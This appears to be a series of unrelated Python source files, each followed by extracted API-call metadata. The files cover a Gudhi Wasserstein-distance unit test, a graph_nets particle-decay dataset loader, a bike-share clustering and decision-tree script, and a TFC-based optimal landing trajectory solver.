'os.path.join', 'os.path.join', (['folder', 'format'], {}), '(folder, format)\n', (6388, 6404), False, 'import os\n'), ((6858, 6878), 'random.choice', 'random.choice', (['files'], {}), '(files)\n', (6871, 6878), False, 'import random\n'), ((8391, 8423), 'random.shuffle', 'random.shuffle', (['img_texture_mask'], {}), '(img_texture_mask)\n', (8405, 8423), False, 'import random\n'), ((6920, 6940), 'PIL.Image.open', 'Image.open', (['file_cur'], {}), '(file_cur)\n', (6930, 6940), False, 'from PIL import Image\n'), ((7999, 8045), 'numpy.random.choice', 'np.random.choice', (['self.segmentation_regions', '(1)'], {}), '(self.segmentation_regions, 1)\n', (8015, 8045), True, 'import numpy as np\n'), ((8651, 8665), 'numpy.array', 'np.array', (['imgs'], {}), '(imgs)\n', (8659, 8665), True, 'import numpy as np\n'), ((8744, 8762), 'numpy.array', 'np.array', (['textures'], {}), '(textures)\n', (8752, 8762), True, 'import numpy as np\n'), ((8846, 8861), 'numpy.array', 'np.array', (['masks'], {}), '(masks)\n', (8854, 8861), True, 'import numpy as np\n'), ((6616, 6635), 'numpy.asarray', 'np.asarray', (['img_cur'], {}), '(img_cur)\n', (6626, 6635), True, 'import numpy as np\n'), ((3547, 3566), 'numpy.asarray', 'np.asarray', (['img_cur'], {}), '(img_cur)\n', (3557, 3566), True, 'import numpy as np\n'), ((2923, 2942), 'numpy.asarray', 'np.asarray', (['img_cur'], {}), '(img_cur)\n', (2933, 2942), True, 'import numpy as np\n'), ((3227, 3250), 'numpy.asarray', 'np.asarray', (['texture_cur'], {}), '(texture_cur)\n', (3237, 3250), True, 'import numpy as np\n')]
|
from gudhi.wasserstein import wasserstein_distance
import numpy as np
""" This file is part of the Gudhi Library - https://gudhi.inria.fr/ - which is released under MIT.
See file LICENSE or go to https://gudhi.inria.fr/licensing/ for full license details.
Author(s): <NAME>
Copyright (C) 2019 Inria
Modification(s):
- YYYY/MM Author: Description of the modification
"""
__author__ = "<NAME>"
__copyright__ = "Copyright (C) 2019 Inria"
__license__ = "MIT"
def test_basic_wasserstein():
diag1 = np.array([[2.7, 3.7], [9.6, 14.0], [34.2, 34.974]])
diag2 = np.array([[2.8, 4.45], [9.5, 14.1]])
diag3 = np.array([[0, 2], [4, 6]])
diag4 = np.array([[0, 3], [4, 8]])
emptydiag = np.array([[]])
assert wasserstein_distance(emptydiag, emptydiag, q=2., p=1.) == 0.
assert wasserstein_distance(emptydiag, emptydiag, q=np.inf, p=1.) == 0.
assert wasserstein_distance(emptydiag, emptydiag, q=np.inf, p=2.) == 0.
assert wasserstein_distance(emptydiag, emptydiag, q=2., p=2.) == 0.
assert wasserstein_distance(diag3, emptydiag, q=np.inf, p=1.) == 2.
assert wasserstein_distance(diag3, emptydiag, q=1., p=1.) == 4.
assert wasserstein_distance(diag4, emptydiag, q=1., p=2.) == 5. # thank you Pythagorician triplets
assert wasserstein_distance(diag4, emptydiag, q=np.inf, p=2.) == 2.5
assert wasserstein_distance(diag4, emptydiag, q=2., p=2.) == 3.5355339059327378
assert wasserstein_distance(diag1, diag2, q=2., p=1.) == 1.4453593023967701
assert wasserstein_distance(diag1, diag2, q=2.35, p=1.74) == 0.9772734057168739
assert wasserstein_distance(diag1, emptydiag, q=2.35, p=1.7863) == 3.141592214572228
assert wasserstein_distance(diag3, diag4, q=1., p=1.) == 3.
assert wasserstein_distance(diag3, diag4, q=np.inf, p=1.) == 3. # no diag matching here
assert wasserstein_distance(diag3, diag4, q=np.inf, p=2.) == np.sqrt(5)
assert wasserstein_distance(diag3, diag4, q=1., p=2.) == np.sqrt(5)
assert wasserstein_distance(diag3, diag4, q=4.5, p=2.) == np.sqrt(5)
|
[
"numpy.array",
"gudhi.wasserstein.wasserstein_distance",
"numpy.sqrt"
] |
[((531, 582), 'numpy.array', 'np.array', (['[[2.7, 3.7], [9.6, 14.0], [34.2, 34.974]]'], {}), '([[2.7, 3.7], [9.6, 14.0], [34.2, 34.974]])\n', (539, 582), True, 'import numpy as np\n'), ((595, 631), 'numpy.array', 'np.array', (['[[2.8, 4.45], [9.5, 14.1]]'], {}), '([[2.8, 4.45], [9.5, 14.1]])\n', (603, 631), True, 'import numpy as np\n'), ((644, 670), 'numpy.array', 'np.array', (['[[0, 2], [4, 6]]'], {}), '([[0, 2], [4, 6]])\n', (652, 670), True, 'import numpy as np\n'), ((683, 709), 'numpy.array', 'np.array', (['[[0, 3], [4, 8]]'], {}), '([[0, 3], [4, 8]])\n', (691, 709), True, 'import numpy as np\n'), ((726, 740), 'numpy.array', 'np.array', (['[[]]'], {}), '([[]])\n', (734, 740), True, 'import numpy as np\n'), ((753, 809), 'gudhi.wasserstein.wasserstein_distance', 'wasserstein_distance', (['emptydiag', 'emptydiag'], {'q': '(2.0)', 'p': '(1.0)'}), '(emptydiag, emptydiag, q=2.0, p=1.0)\n', (773, 809), False, 'from gudhi.wasserstein import wasserstein_distance\n'), ((825, 884), 'gudhi.wasserstein.wasserstein_distance', 'wasserstein_distance', (['emptydiag', 'emptydiag'], {'q': 'np.inf', 'p': '(1.0)'}), '(emptydiag, emptydiag, q=np.inf, p=1.0)\n', (845, 884), False, 'from gudhi.wasserstein import wasserstein_distance\n'), ((901, 960), 'gudhi.wasserstein.wasserstein_distance', 'wasserstein_distance', (['emptydiag', 'emptydiag'], {'q': 'np.inf', 'p': '(2.0)'}), '(emptydiag, emptydiag, q=np.inf, p=2.0)\n', (921, 960), False, 'from gudhi.wasserstein import wasserstein_distance\n'), ((977, 1033), 'gudhi.wasserstein.wasserstein_distance', 'wasserstein_distance', (['emptydiag', 'emptydiag'], {'q': '(2.0)', 'p': '(2.0)'}), '(emptydiag, emptydiag, q=2.0, p=2.0)\n', (997, 1033), False, 'from gudhi.wasserstein import wasserstein_distance\n'), ((1050, 1105), 'gudhi.wasserstein.wasserstein_distance', 'wasserstein_distance', (['diag3', 'emptydiag'], {'q': 'np.inf', 'p': '(1.0)'}), '(diag3, emptydiag, q=np.inf, p=1.0)\n', (1070, 1105), False, 'from gudhi.wasserstein import wasserstein_distance\n'), ((1122, 1174), 'gudhi.wasserstein.wasserstein_distance', 'wasserstein_distance', (['diag3', 'emptydiag'], {'q': '(1.0)', 'p': '(1.0)'}), '(diag3, emptydiag, q=1.0, p=1.0)\n', (1142, 1174), False, 'from gudhi.wasserstein import wasserstein_distance\n'), ((1191, 1243), 'gudhi.wasserstein.wasserstein_distance', 'wasserstein_distance', (['diag4', 'emptydiag'], {'q': '(1.0)', 'p': '(2.0)'}), '(diag4, emptydiag, q=1.0, p=2.0)\n', (1211, 1243), False, 'from gudhi.wasserstein import wasserstein_distance\n'), ((1295, 1350), 'gudhi.wasserstein.wasserstein_distance', 'wasserstein_distance', (['diag4', 'emptydiag'], {'q': 'np.inf', 'p': '(2.0)'}), '(diag4, emptydiag, q=np.inf, p=2.0)\n', (1315, 1350), False, 'from gudhi.wasserstein import wasserstein_distance\n'), ((1368, 1420), 'gudhi.wasserstein.wasserstein_distance', 'wasserstein_distance', (['diag4', 'emptydiag'], {'q': '(2.0)', 'p': '(2.0)'}), '(diag4, emptydiag, q=2.0, p=2.0)\n', (1388, 1420), False, 'from gudhi.wasserstein import wasserstein_distance\n'), ((1453, 1501), 'gudhi.wasserstein.wasserstein_distance', 'wasserstein_distance', (['diag1', 'diag2'], {'q': '(2.0)', 'p': '(1.0)'}), '(diag1, diag2, q=2.0, p=1.0)\n', (1473, 1501), False, 'from gudhi.wasserstein import wasserstein_distance\n'), ((1533, 1583), 'gudhi.wasserstein.wasserstein_distance', 'wasserstein_distance', (['diag1', 'diag2'], {'q': '(2.35)', 'p': '(1.74)'}), '(diag1, diag2, q=2.35, p=1.74)\n', (1553, 1583), False, 'from gudhi.wasserstein import wasserstein_distance\n'), ((1618, 1674), 'gudhi.wasserstein.wasserstein_distance', 'wasserstein_distance', (['diag1', 'emptydiag'], {'q': '(2.35)', 'p': '(1.7863)'}), '(diag1, emptydiag, q=2.35, p=1.7863)\n', (1638, 1674), False, 'from gudhi.wasserstein import wasserstein_distance\n'), ((1708, 1756), 'gudhi.wasserstein.wasserstein_distance', 'wasserstein_distance', (['diag3', 'diag4'], {'q': '(1.0)', 'p': '(1.0)'}), '(diag3, diag4, q=1.0, p=1.0)\n', (1728, 1756), False, 'from gudhi.wasserstein import wasserstein_distance\n'), ((1772, 1823), 'gudhi.wasserstein.wasserstein_distance', 'wasserstein_distance', (['diag3', 'diag4'], {'q': 'np.inf', 'p': '(1.0)'}), '(diag3, diag4, q=np.inf, p=1.0)\n', (1792, 1823), False, 'from gudhi.wasserstein import wasserstein_distance\n'), ((1865, 1916), 'gudhi.wasserstein.wasserstein_distance', 'wasserstein_distance', (['diag3', 'diag4'], {'q': 'np.inf', 'p': '(2.0)'}), '(diag3, diag4, q=np.inf, p=2.0)\n', (1885, 1916), False, 'from gudhi.wasserstein import wasserstein_distance\n'), ((1919, 1929), 'numpy.sqrt', 'np.sqrt', (['(5)'], {}), '(5)\n', (1926, 1929), True, 'import numpy as np\n'), ((1941, 1989), 'gudhi.wasserstein.wasserstein_distance', 'wasserstein_distance', (['diag3', 'diag4'], {'q': '(1.0)', 'p': '(2.0)'}), '(diag3, diag4, q=1.0, p=2.0)\n', (1961, 1989), False, 'from gudhi.wasserstein import wasserstein_distance\n'), ((1991, 2001), 'numpy.sqrt', 'np.sqrt', (['(5)'], {}), '(5)\n', (1998, 2001), True, 'import numpy as np\n'), ((2013, 2061), 'gudhi.wasserstein.wasserstein_distance', 'wasserstein_distance', (['diag3', 'diag4'], {'q': '(4.5)', 'p': '(2.0)'}), '(diag3, diag4, q=4.5, p=2.0)\n', (2033, 2061), False, 'from gudhi.wasserstein import wasserstein_distance\n'), ((2064, 2074), 'numpy.sqrt', 'np.sqrt', (['(5)'], {}), '(5)\n', (2071, 2074), True, 'import numpy as np\n')]
|
import numpy as np
import itertools
from graph_nets import utils_tf
from root_gnn.src.datasets.base import DataSet
n_node_features = 6
max_nodes = 3 # including the particle that decays
def num_particles(event):
return len(event) // n_node_features
def make_graph(event, debug=False):
# each particle contains: pdgID, E, px, py, pz.
scale = 0.0001
n_nodes = num_particles(event)
nodes = [[
event[inode*n_node_features+1], # E
event[inode*n_node_features+2], # px
event[inode*n_node_features+3], # py
event[inode*n_node_features+4] # pz
] for inode in range(n_nodes)]
nodes = np.array(nodes, dtype=np.float32) * scale
if debug:
print(n_nodes, "nodes")
print("node features:", nodes.shape)
if nodes.shape[0] > max_nodes:
print("cluster decays to more than {} nodes".format(max_nodes))
return [(None, None)]
elif nodes.shape[0] < max_nodes:
print("nodes: {} less than maximum {}".format(nodes.shape[0], max_nodes))
print(event)
new_nodes = np.zeros([max_nodes, 4], dtype=np.float32)
new_nodes[:nodes.shape[0], :] = nodes
nodes = new_nodes
all_edges = list(itertools.combinations(range(n_nodes), 2))
senders = np.array([x[0] for x in all_edges])
receivers = np.array([x[1] for x in all_edges])
n_edges = len(all_edges)
edges = np.expand_dims(np.array([0.0]*n_edges, dtype=np.float32), axis=1)
input_datadict = {
"n_node": 1,
"n_edge": 1,
"nodes": nodes[0, :].reshape((1, -1)),
"edges": np.expand_dims(np.array([1.0]*1, dtype=np.float32), axis=1),
"senders": np.array([0]),
"receivers": np.array([0]),
"globals": np.array([1], dtype=np.float32)
}
target_datadict = {
"n_node": n_nodes,
"n_edge": n_edges,
"nodes": nodes,
"edges": edges,
"senders": senders,
"receivers": receivers,
"globals": np.array([1]*(n_nodes-1)+[0]*(max_nodes-n_nodes+1), dtype=np.float32)
}
input_graph = utils_tf.data_dicts_to_graphs_tuple([input_datadict])
target_graph = utils_tf.data_dicts_to_graphs_tuple([target_datadict])
return [(input_graph, target_graph)]
def read(filename):
with open(filename, 'r') as f:
for line in f:
yield [float(x) for x in line.split()]
class HerwigHadrons(DataSet):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.read = read
self.make_graph = make_graph
|
[
"numpy.zeros",
"numpy.array",
"graph_nets.utils_tf.data_dicts_to_graphs_tuple"
] |
[((1265, 1300), 'numpy.array', 'np.array', (['[x[0] for x in all_edges]'], {}), '([x[0] for x in all_edges])\n', (1273, 1300), True, 'import numpy as np\n'), ((1317, 1352), 'numpy.array', 'np.array', (['[x[1] for x in all_edges]'], {}), '([x[1] for x in all_edges])\n', (1325, 1352), True, 'import numpy as np\n'), ((2078, 2131), 'graph_nets.utils_tf.data_dicts_to_graphs_tuple', 'utils_tf.data_dicts_to_graphs_tuple', (['[input_datadict]'], {}), '([input_datadict])\n', (2113, 2131), False, 'from graph_nets import utils_tf\n'), ((2151, 2205), 'graph_nets.utils_tf.data_dicts_to_graphs_tuple', 'utils_tf.data_dicts_to_graphs_tuple', (['[target_datadict]'], {}), '([target_datadict])\n', (2186, 2205), False, 'from graph_nets import utils_tf\n'), ((639, 672), 'numpy.array', 'np.array', (['nodes'], {'dtype': 'np.float32'}), '(nodes, dtype=np.float32)\n', (647, 672), True, 'import numpy as np\n'), ((1409, 1452), 'numpy.array', 'np.array', (['([0.0] * n_edges)'], {'dtype': 'np.float32'}), '([0.0] * n_edges, dtype=np.float32)\n', (1417, 1452), True, 'import numpy as np\n'), ((1670, 1683), 'numpy.array', 'np.array', (['[0]'], {}), '([0])\n', (1678, 1683), True, 'import numpy as np\n'), ((1706, 1719), 'numpy.array', 'np.array', (['[0]'], {}), '([0])\n', (1714, 1719), True, 'import numpy as np\n'), ((1740, 1771), 'numpy.array', 'np.array', (['[1]'], {'dtype': 'np.float32'}), '([1], dtype=np.float32)\n', (1748, 1771), True, 'import numpy as np\n'), ((1983, 2069), 'numpy.array', 'np.array', (['([1] * (n_nodes - 1) + [0] * (max_nodes - n_nodes + 1))'], {'dtype': 'np.float32'}), '([1] * (n_nodes - 1) + [0] * (max_nodes - n_nodes + 1), dtype=np.\n float32)\n', (1991, 2069), True, 'import numpy as np\n'), ((1071, 1113), 'numpy.zeros', 'np.zeros', (['[max_nodes, 4]'], {'dtype': 'np.float32'}), '([max_nodes, 4], dtype=np.float32)\n', (1079, 1113), True, 'import numpy as np\n'), ((1605, 1642), 'numpy.array', 'np.array', (['([1.0] * 1)'], {'dtype': 'np.float32'}), '([1.0] * 1, dtype=np.float32)\n', (1613, 1642), True, 'import numpy as np\n')]
|
# Load the necessary libraries
import matplotlib.pyplot as plt
import numpy
import pandas
import sklearn.cluster as cluster
import sklearn.metrics as metrics
bikeshare = pandas.read_csv('C:\\Users\\minlam\\Documents\\IIT\\Machine Learning\\Data\\BikeSharingDemand_Train.csv',
delimiter=',')
# Use only these four interval variables
trainData = bikeshare[['temp', 'humidity', 'windspeed']].dropna()
nObs = trainData.shape[0]
# Determine the number of clusters using the Silhouette metrics
nClusters = numpy.zeros(15)
Elbow = numpy.zeros(15)
Silhouette = numpy.zeros(15)
for c in range(15):
KClusters = c + 1
nClusters[c] = KClusters
kmeans = cluster.KMeans(n_clusters=KClusters, random_state=60616).fit(trainData)
if (KClusters > 1):
Silhouette[c] = metrics.silhouette_score(trainData, kmeans.labels_)
WCSS = numpy.zeros(KClusters)
nC = numpy.zeros(KClusters)
for i in range(nObs):
k = kmeans.labels_[i]
nC[k] += 1
diff = trainData.iloc[i,] - kmeans.cluster_centers_[k]
WCSS[k] += diff.dot(diff)
Elbow[c] = 0
for k in range(KClusters):
Elbow[c] += WCSS[k] / nC[k]
print("Cluster Size Elbow Value Silhouette Value: /n")
for c in range(15):
print(nClusters[c], Elbow[c], Silhouette[c])
plt.plot(nClusters, Elbow, linewidth = 2, marker = 'o')
plt.xticks(range(1,15,1))
plt.grid(True)
plt.xlabel("Number of Clusters")
plt.ylabel("Elbow Value")
plt.show()
# Plot the Silhouette metrics versus the number of clusters
plt.plot(nClusters, Silhouette, linewidth = 2, marker = 'o')
plt.xticks(range(1,15,1))
plt.grid(True)
plt.xlabel("Number of Clusters")
plt.ylabel("Silhouette Value")
plt.show()
KClusters = 2
kmeans = cluster.KMeans(n_clusters=KClusters, random_state=60616).fit(trainData)
nC = numpy.zeros(KClusters)
for i in range(nObs):
k = kmeans.labels_[i]
nC[k] += 1
print(nC)
for k in range(KClusters):
print("Cluster ", k)
print("Centroid = ", kmeans.cluster_centers_[k])
# Load the TREE library from SKLEARN
from sklearn import tree
classTree = tree.DecisionTreeClassifier(criterion='entropy', max_depth=4, random_state=60616)
bikeshare_DT = classTree.fit(trainData, kmeans.labels_)
print('Accuracy of Decision Tree classifier on training set: {:.6f}' .format(classTree.score(trainData, kmeans.labels_)))
import graphviz
dot_data = tree.export_graphviz(bikeshare_DT,
out_file=None,
impurity = True, filled = True,
feature_names = ['temp', 'humidity', 'windspeed'],
class_names = ['Cluster 0', 'Cluster 1'])
graph = graphviz.Source(dot_data)
graph
graph.render('C:\\Users\\minlam\\Documents\\IIT\\Machine Learning\\Job\\hmeq_output')
|
[
"matplotlib.pyplot.show",
"matplotlib.pyplot.plot",
"pandas.read_csv",
"sklearn.cluster.KMeans",
"numpy.zeros",
"sklearn.tree.DecisionTreeClassifier",
"sklearn.tree.export_graphviz",
"sklearn.metrics.silhouette_score",
"graphviz.Source",
"matplotlib.pyplot.ylabel",
"matplotlib.pyplot.xlabel",
"matplotlib.pyplot.grid"
] |
[((178, 308), 'pandas.read_csv', 'pandas.read_csv', (['"""C:\\\\Users\\\\minlam\\\\Documents\\\\IIT\\\\Machine Learning\\\\Data\\\\BikeSharingDemand_Train.csv"""'], {'delimiter': '""","""'}), "(\n 'C:\\\\Users\\\\minlam\\\\Documents\\\\IIT\\\\Machine Learning\\\\Data\\\\BikeSharingDemand_Train.csv'\n , delimiter=',')\n", (193, 308), False, 'import pandas\n'), ((546, 561), 'numpy.zeros', 'numpy.zeros', (['(15)'], {}), '(15)\n', (557, 561), False, 'import numpy\n'), ((571, 586), 'numpy.zeros', 'numpy.zeros', (['(15)'], {}), '(15)\n', (582, 586), False, 'import numpy\n'), ((601, 616), 'numpy.zeros', 'numpy.zeros', (['(15)'], {}), '(15)\n', (612, 616), False, 'import numpy\n'), ((1337, 1388), 'matplotlib.pyplot.plot', 'plt.plot', (['nClusters', 'Elbow'], {'linewidth': '(2)', 'marker': '"""o"""'}), "(nClusters, Elbow, linewidth=2, marker='o')\n", (1345, 1388), True, 'import matplotlib.pyplot as plt\n'), ((1421, 1435), 'matplotlib.pyplot.grid', 'plt.grid', (['(True)'], {}), '(True)\n', (1429, 1435), True, 'import matplotlib.pyplot as plt\n'), ((1437, 1469), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Number of Clusters"""'], {}), "('Number of Clusters')\n", (1447, 1469), True, 'import matplotlib.pyplot as plt\n'), ((1471, 1496), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Elbow Value"""'], {}), "('Elbow Value')\n", (1481, 1496), True, 'import matplotlib.pyplot as plt\n'), ((1498, 1508), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (1506, 1508), True, 'import matplotlib.pyplot as plt\n'), ((1573, 1629), 'matplotlib.pyplot.plot', 'plt.plot', (['nClusters', 'Silhouette'], {'linewidth': '(2)', 'marker': '"""o"""'}), "(nClusters, Silhouette, linewidth=2, marker='o')\n", (1581, 1629), True, 'import matplotlib.pyplot as plt\n'), ((1662, 1676), 'matplotlib.pyplot.grid', 'plt.grid', (['(True)'], {}), '(True)\n', (1670, 1676), True, 'import matplotlib.pyplot as plt\n'), ((1678, 1710), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Number of Clusters"""'], {}), "('Number of Clusters')\n", (1688, 1710), True, 'import matplotlib.pyplot as plt\n'), ((1712, 1742), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Silhouette Value"""'], {}), "('Silhouette Value')\n", (1722, 1742), True, 'import matplotlib.pyplot as plt\n'), ((1744, 1754), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (1752, 1754), True, 'import matplotlib.pyplot as plt\n'), ((1862, 1884), 'numpy.zeros', 'numpy.zeros', (['KClusters'], {}), '(KClusters)\n', (1873, 1884), False, 'import numpy\n'), ((2147, 2233), 'sklearn.tree.DecisionTreeClassifier', 'tree.DecisionTreeClassifier', ([], {'criterion': '"""entropy"""', 'max_depth': '(4)', 'random_state': '(60616)'}), "(criterion='entropy', max_depth=4, random_state=\n 60616)\n", (2174, 2233), False, 'from sklearn import tree\n'), ((2442, 2618), 'sklearn.tree.export_graphviz', 'tree.export_graphviz', (['bikeshare_DT'], {'out_file': 'None', 'impurity': '(True)', 'filled': '(True)', 'feature_names': "['temp', 'humidity', 'windspeed']", 'class_names': "['Cluster 0', 'Cluster 1']"}), "(bikeshare_DT, out_file=None, impurity=True, filled=\n True, feature_names=['temp', 'humidity', 'windspeed'], class_names=[\n 'Cluster 0', 'Cluster 1'])\n", (2462, 2618), False, 'from sklearn import tree\n'), ((2760, 2785), 'graphviz.Source', 'graphviz.Source', (['dot_data'], {}), '(dot_data)\n', (2775, 2785), False, 'import graphviz\n'), ((893, 915), 'numpy.zeros', 'numpy.zeros', (['KClusters'], {}), '(KClusters)\n', (904, 915), False, 'import numpy\n'), ((925, 947), 'numpy.zeros', 'numpy.zeros', (['KClusters'], {}), '(KClusters)\n', (936, 947), False, 'import numpy\n'), ((828, 879), 'sklearn.metrics.silhouette_score', 'metrics.silhouette_score', (['trainData', 'kmeans.labels_'], {}), '(trainData, kmeans.labels_)\n', (852, 879), True, 'import sklearn.metrics as metrics\n'), ((1782, 1838), 'sklearn.cluster.KMeans', 'cluster.KMeans', ([], {'n_clusters': 'KClusters', 'random_state': '(60616)'}), '(n_clusters=KClusters, random_state=60616)\n', (1796, 1838), True, 'import sklearn.cluster as cluster\n'), ((706, 762), 'sklearn.cluster.KMeans', 'cluster.KMeans', ([], {'n_clusters': 'KClusters', 'random_state': '(60616)'}), '(n_clusters=KClusters, random_state=60616)\n', (720, 762), True, 'import sklearn.cluster as cluster\n')]
|
from tfc import utfc
from tfc.utils import TFCDictRobust, egrad, NllsClass, MakePlot
import numpy as onp
import jax.numpy as np
from jax import vmap, jacfwd, jit, lax
import tqdm
import pickle
from scipy.optimize import fsolve
from scipy.integrate import simps
from time import process_time as timer
## TEST PARAMETERS: ***************************************************
tol = np.finfo(float).eps
maxIter = 50
W = False
if W == False:
Gam = 0.
else:
Gam = 100.
## CONSTANTS: *********************************************************
# Number of points to use
N = 100
# Number of basis functions to use
ms = 30
mc = 1
# Number of constraints
nCx = 0
nCy = 0
## GET CHEBYSHEV VALUES **********************************************
stfc = utfc(N,nCx,ms,basis='CP',x0 = -1, xf = 1.)
ctfc = utfc(N,nCy,mc,basis='CP',x0 = -1, xf = 1.)
Hs = stfc.H
Hc = ctfc.H
## DEFINE THE ASSUMED SOLUTION **************************************
z = stfc.z
z0 = z[0]
zf = z[-1]
## DEFINE CONSTRAINED EXPRESSION *************************************
r = lambda z, xi, IC: np.dot(Hs(z),xi['xis'])
v = egrad(r,0)
a = egrad(v,0)
lam = lambda z, xi: np.dot(Hc(z),xi['xic'])
lamr = egrad(lam,0)
## FORM LOSS AND JACOBIAN ***********************************************************************************
L0 = lambda xi,IC: r(z,xi,IC)[0,:] - IC['R0']
Ld0 = lambda xi,IC: IC['c'] * v(z,xi,IC)[0,:] - IC['V0']
Lf = lambda xi,IC: r(z,xi,IC)[-1,:]
Ldf = lambda xi,IC: IC['c'] * v(z,xi,IC)[-1,:]
Ls = lambda xi,IC: IC['c']**2 * a(z,xi,IC) - IC['ag'] + lam(z,xi)
# Htf = lambda xi,IC: np.dot(lam(z,xi)[-1,:],(-1./2.*lam(z,xi)[-1,:] + IC['ag']))
# Updated because need to at lam_r * v term for spectral method
Htf = lambda xi,IC: np.dot(lam(z,xi)[-1,:],(-1./2.*lam(z,xi)[-1,:] + IC['ag'])) \
+ np.dot(-IC['c'] *lamr(z,xi)[-1,:], IC['c'] * v(z,xi,IC)[-1,:]) + IC['Gam']
L = jit(lambda xi,IC: np.hstack(( Ls(xi,IC)[1:-1,:].flatten(), \
L0(xi,IC).flatten(), \
Ld0(xi,IC).flatten(), \
Lf(xi,IC).flatten(), \
Ldf(xi,IC).flatten() )) )
## INITIALIZE VARIABLES *************************************************************************************
xis = onp.zeros((Hs(z).shape[1],3))
xic = onp.zeros((Hc(z).shape[1],3))
if W == False:
b = np.sqrt(2)*onp.ones(1)
else:
b = np.sqrt(10)*onp.ones(1)
xi = TFCDictRobust({'xis':xis,\
'xic':xic})
IC = {'R0': np.zeros((3,)), \
'V0': np.zeros((3,)), \
'ag': np.zeros((3,)), \
'Gam': np.zeros((1,)), \
'c': 2.*onp.ones(1)}
## NONLINEAR LEAST-SQUARES CLASS *****************************************************************************
nlls = NllsClass(xi,L,maxIter=2,timer=True)
R0 = np.array([500000., 100000., 50000.])
V0 = np.array([-3000., 0., 0.])
## scale initial conditons
pscale = np.max(np.abs(R0))
tscale = pscale/np.max(np.abs(V0))
IC['R0'] = R0 / pscale
IC['V0'] = V0 * tscale/pscale
IC['ag'] = np.array([0., 0., -5.314961]) * tscale**2/pscale
IC['Gam'] = Gam * tscale**4/pscale**2
global it
it = 0
def Innerloop(tf,xi,IC):
global it
IC['c'] = 2./tf
it += 1
xi,_,time = nlls.run(xi,IC)
loss1 = np.max(np.abs(L(xi,IC)))
loss2 = np.max(np.abs(Htf(xi,IC)))
return np.max(np.hstack((loss1,loss2)))
t0 = 2./IC['c']
start = timer()
tf = fsolve(Innerloop, t0, args=(xi,IC), xtol=1e-13,epsfcn=tol)
time = timer() - start
IC['c'] = 2./tf
xi,_,_ = nlls.run(xi,IC)
## CONSTRUCT SOLUTION **********************************************
t = (z-z[0])/IC['c'] * tscale
IC['Gam']= IC['Gam'] * pscale**2/tscale**4
R = r(z,xi,IC) * pscale
V = v(z,xi,IC) * pscale/tscale
LamV = lam(z,xi) * pscale/tscale**2
LamR = -IC['c'] * egrad(lam)(z,xi) * pscale/tscale**3
Ac = - LamV
Ham = onp.zeros(len(t))
int = onp.zeros(len(t))
a_mag = onp.zeros(len(t))
for i in range(0,len(t)):
int[i] = np.dot(Ac[i,:],Ac[i,:])
Ham[i] = 0.5*int[i] + np.dot(LamR[i,:],V[i,:]) + np.dot(LamV[i,:],IC['ag'] + Ac[i,:])
a_mag[i] = np.linalg.norm(Ac[i,:])
cost = IC['Gam']* t[-1] + 0.5 * simps(int,t)
loss1 = np.max(np.abs(L(xi,IC)))
loss2 = np.max(np.abs(Htf(xi,IC)))\
##: print final answers to screen
print('\nFinal time [s]:\t' + str(t[-1]))
print('Cost:\t\t' + str(cost))
print('Comp time [ms]:\t' + str(time*1000))
print('Iterations:\t' + str(it))
print('Loss:\t\t' + str(np.max(np.hstack((loss1,loss2)))))
|
[
"jax.numpy.array",
"jax.numpy.dot",
"tfc.utils.egrad",
"tfc.utils.TFCDictRobust",
"time.process_time",
"scipy.optimize.fsolve",
"jax.numpy.finfo",
"jax.numpy.sqrt",
"numpy.ones",
"tfc.utils.NllsClass",
"jax.numpy.linalg.norm",
"jax.numpy.hstack",
"jax.numpy.zeros",
"jax.numpy.abs",
"tfc.utfc",
"scipy.integrate.simps"
] |
[((754, 797), 'tfc.utfc', 'utfc', (['N', 'nCx', 'ms'], {'basis': '"""CP"""', 'x0': '(-1)', 'xf': '(1.0)'}), "(N, nCx, ms, basis='CP', x0=-1, xf=1.0)\n", (758, 797), False, 'from tfc import utfc\n'), ((804, 847), 'tfc.utfc', 'utfc', (['N', 'nCy', 'mc'], {'basis': '"""CP"""', 'x0': '(-1)', 'xf': '(1.0)'}), "(N, nCy, mc, basis='CP', x0=-1, xf=1.0)\n", (808, 847), False, 'from tfc import utfc\n'), ((1100, 1111), 'tfc.utils.egrad', 'egrad', (['r', '(0)'], {}), '(r, 0)\n', (1105, 1111), False, 'from tfc.utils import TFCDictRobust, egrad, NllsClass, MakePlot\n'), ((1115, 1126), 'tfc.utils.egrad', 'egrad', (['v', '(0)'], {}), '(v, 0)\n', (1120, 1126), False, 'from tfc.utils import TFCDictRobust, egrad, NllsClass, MakePlot\n'), ((1178, 1191), 'tfc.utils.egrad', 'egrad', (['lam', '(0)'], {}), '(lam, 0)\n', (1183, 1191), False, 'from tfc.utils import TFCDictRobust, egrad, NllsClass, MakePlot\n'), ((2460, 2499), 'tfc.utils.TFCDictRobust', 'TFCDictRobust', (["{'xis': xis, 'xic': xic}"], {}), "({'xis': xis, 'xic': xic})\n", (2473, 2499), False, 'from tfc.utils import TFCDictRobust, egrad, NllsClass, MakePlot\n'), ((2787, 2826), 'tfc.utils.NllsClass', 'NllsClass', (['xi', 'L'], {'maxIter': '(2)', 'timer': '(True)'}), '(xi, L, maxIter=2, timer=True)\n', (2796, 2826), False, 'from tfc.utils import TFCDictRobust, egrad, NllsClass, MakePlot\n'), ((2830, 2869), 'jax.numpy.array', 'np.array', (['[500000.0, 100000.0, 50000.0]'], {}), '([500000.0, 100000.0, 50000.0])\n', (2838, 2869), True, 'import jax.numpy as np\n'), ((2872, 2901), 'jax.numpy.array', 'np.array', (['[-3000.0, 0.0, 0.0]'], {}), '([-3000.0, 0.0, 0.0])\n', (2880, 2901), True, 'import jax.numpy as np\n'), ((3423, 3430), 'time.process_time', 'timer', ([], {}), '()\n', (3428, 3430), True, 'from time import process_time as timer\n'), ((3436, 3496), 'scipy.optimize.fsolve', 'fsolve', (['Innerloop', 't0'], {'args': '(xi, IC)', 'xtol': '(1e-13)', 'epsfcn': 'tol'}), '(Innerloop, t0, args=(xi, IC), xtol=1e-13, epsfcn=tol)\n', (3442, 3496), False, 'from scipy.optimize import fsolve\n'), ((382, 397), 'jax.numpy.finfo', 'np.finfo', (['float'], {}), '(float)\n', (390, 397), True, 'import jax.numpy as np\n'), ((2532, 2546), 'jax.numpy.zeros', 'np.zeros', (['(3,)'], {}), 